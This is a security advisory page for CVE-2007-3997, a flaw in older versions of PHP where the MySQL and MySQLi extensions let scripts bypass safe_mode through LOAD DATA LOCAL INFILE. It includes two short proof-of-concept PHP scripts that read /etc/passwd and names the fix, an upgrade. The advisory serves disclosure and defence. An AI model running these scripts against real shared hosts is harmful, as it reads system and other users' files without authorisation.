PHP MySQL/MySQLi Safe Mode Bypass Vulnerability

2007-09-08 / 2012-03-12
Risk: Low
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

PHP MySQL/MySQLi Safe Mode Bypass Vulnerability Affected Products: <= PHP 5.2.3 <= PHP 4.4.7 Authors: Mattias Bengtsson <mattias@secweb.se> Philip Olausson <po@secweb.se> Reported: 2007-06-05 Released: 2007-08-30 CVE: CVE-2007-3997 Issue: A vulnerability exists in PHP's MySQL and MySQLi extenstions which can be used to bypass PHP's safe_mode security restriction. Description: PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Details: By using MySQLs LOCAL INFILE we could bypass PHP's safe_mode security restriction. An important thing here is that we can't rely on the shared hosts MySQLds local-infile=0 option. This because of it being a server option, so it will not have any effect on the client. To disable this option for MySQL we need to compile libmysqlclient with --disable-local-infile, or remove the CLIENT_LOCAL_FILES flag while connecting. PHP does this when open_basedir are in effect but lacks a check for safe_mode. For MySQLi compiling with --disable-local-infile won't help because we could just reenable it with mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1); Proof Of Concepts: MySQL: <?php file_get_contents('/etc/passwd'); $l = mysql_connect("localhost", "root"); mysql_query("CREATE DATABASE a"); mysql_query("CREATE TABLE a.a (a varchar(1024))"); mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'"); mysql_close($l); mysql_connect("localhost", "aaaa"); mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $result = mysql_query("SELECT a FROM a.a"); while(list($row) = mysql_fetch_row($result)) print $row . chr(10); ?> MySQLi: <?php function r($fp, &$buf, $len, &$err) { print fread($fp, $len); } $m = new mysqli('localhost', 'aaaa', '', 'a'); $m->options(MYSQLI_OPT_LOCAL_INFILE, 1); $m->set_local_infile_handler("r"); $m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $m->close(); ?> Impact: This issue could have major impact on shared hosting systems. Solution: Upgrade PHP to 5.2.4 or 4.4.8

References:

http://www.php.net/releases/5_2_4.php
http://www.php.net/ChangeLog-5.php#5.2.4
http://www.milw0rm.com/exploits/4392
http://secweb.se/en/advisories/php-mysql-safe-mode-bypass-vulnerability/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top